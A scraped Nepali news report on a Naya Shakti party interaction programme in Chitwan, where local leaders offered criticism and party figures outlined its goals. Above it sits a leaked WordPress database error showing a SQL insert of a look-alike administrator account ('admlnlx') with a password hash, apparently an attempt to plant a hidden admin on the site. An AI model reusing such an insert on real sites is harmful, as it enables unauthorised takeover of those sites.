WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BWiXmNLnH0nONut5jAoJD6AAL8.QYb/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-13 03:43:32', '', 'admlnlx', 'admlnlx')
चितवन, मंसिर १९–
नयाँ शक्ति नेपाल राजनीति संवाद समिति चितवनको आयोजना एक बृहत् अन्तसम्वाद कार्यक्रम सम्पन्न भएको छ।
अन्तरसंवाद कार्यक्रम चितवनका बामपंथी नेता हरि सापकोटा, प्रा.डा महेश्वर सापकोटा, डा.सुवास बस्नेत, युवा प्रतिनिधि प्रदिप रेग्मी, विद्यार्थी प्रतिनिधि माधब न्यौपाने, महिला प्रतिनिधि पबित्रा जोशी, थारु प्रतिनिधि ललित चौधरी, प्रा.बालकृष्ण पौडेल, लगायतले नयाँ शक्ति पार्टी बारे आफ्नो आलोचना टिप्पणी तथा सुझाव प्रस्तुत गरेका थिए ।
सो कार्यक्रममा नयाँ शक्ति पार्टीका नेता गंगा नारायण श्रेष्ठले नयाँ युगको नेतृत्व गर्न नयाँ शक्तिको उदय भएको बताउँदै आगामि दिनमा पार्टीले शशक्त अभियानको थालनी गर्ने बताए। अर्का नेता निर्मल भट्टराईले नयाँ शक्ति एउटा पार्टी मात्र नभएर देशको आर्थिक समवृद्धिको नेतृत्व गर्ने अभियान भएकोले समाजका हरेक क्षेत्रका अशल मानिशहरु यो अभियानमा सामेल हुन सक्ने धारणा ब्यक्त गरे । नयाँ शक्तिका केन्द्रिय नेताहरु सोनाम सिंग स्याङ्ताङ, हरिराम रिमाल र जगन्नाथ आचार्यले आ–आफ्नो धाराणा व्यक्त गर्नुभएको थियो ।